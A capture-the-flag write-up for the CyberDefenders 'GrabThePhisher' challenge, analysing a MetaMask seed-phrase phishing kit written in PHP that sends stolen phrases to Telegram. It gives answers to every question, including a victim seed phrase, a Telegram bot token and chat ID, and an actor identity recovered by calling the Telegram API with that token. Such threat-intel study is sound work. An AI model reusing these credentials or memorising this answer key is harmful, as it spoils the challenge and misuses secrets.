GrabThePhisher CTF Writeup

Ali Alaa
4 min readJun 10, 2023

Hello dudes,
I hope to find you well.

This is Ali Alaa and this is GrabThePhisher writeup for CyberDefenders platform’s challenge.

This is a Threat Intel challenge and if you wanna find more about this topic you can try GrabThePhisher challenge.

So, lets start….

First Question: Which wallet is used for asking the seed phrase?

I browsed index.html which is main home page for all wallets but directory “pankewk” has a directory called “metamask” only this wallet and excluded others and when I open directory I found file called “metamask.php” that used to make this phishing. So, he used metamask as wallet

All files related to phishing

Here we go, the answer is : Metamask

Second Question: What is the file name that has the code for the phishing kit?

I navigated to “metamask” directory before you can see figure in first question you can find file used to make phishing is “metamask.php”.

Here we go, the answer is : metamask.php

Third Question: In which language was the kit written?

Here from extension of file I figured out the language but what if phisher try to destruct investigator by changing extension or manipulated magic header (may not in case like that but take it in consider) so, I opened it and it open normally.
He didn’t destruct me 😃.

Here we go, the answer is : PHP

Forth Question: What service does the kit use to retrieve the victim’s machine information?

Here I opened “metamask.php” file in text editor to see code inside and what phisher used ..

code to retrieve victim’s machine information

So, he used service called sypexgeo.

Here we go, the answer is : Sypex Geo

Fifth Question: How many seed phrases were already collected?

I analysed php code to know how it works after he sends data to his telegram chat he get content and send it to “log” directory

metamask code
log directory

And store seeds phrases here

seeds phrases

By counting all seeds phrases they will be 3 seeds phrases.

Here we go, the answer is : 3

Sixth Question: Write down the seed phrase of the most recent phishing incident?

Most recent seeds phrase it was last one submitted though form.

Most recent seed phrases

Here we go, the answer is : father also recycle embody balance concert mechanic believe owner pair muffin hockey

Seventh Question: Which medium had been used for credential dumping?

By analyzing php code here the medium used to dump creds.
Phisher user his id and token for his channel

Meduim details

So, medium is telegram.

Here we go, the answer is : Telegram

Eighth Question: What is the token for the channel?

From function “sendTel” I can figure out channel’s token

Channel’s token

Here we go, the answer is : 5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10

Ninth Question: What is the chat ID of the phisher’s channel?

From function “sendTel” I can figure out channel’s id

Channel’s Id

Here we go, the answer is : 5442785564

Tenth Questions: What are the allies of the phish kit developer?

In “metamask.php” file, phisher leave a good comment for his brothers so cute 🥺

Comment

Here we go, the answer is : j1j1b1s@m3r0

Eleventh Question: What is the full name of the Phish Actor?

Here I stuck with this but after some concentration I saw that he used telegram api to send message and after this he get content of file.

This mean this api will response with some kind of data in json format so, lets try to use all data he used before like id and token to send message and may response contain PII data.

Message and Chat data

Here we go, the answer is : Marcus Aurelius

Twelfth Question: What is the username of the Phish Actor?

From response json data we can see username of phish actor

Message and Chat data

Here we go, the answer is : pumpkinboii

At the end ,
I hope you enjoyed this writeup ❤️.

Stay in touch

LinkedIn

--

--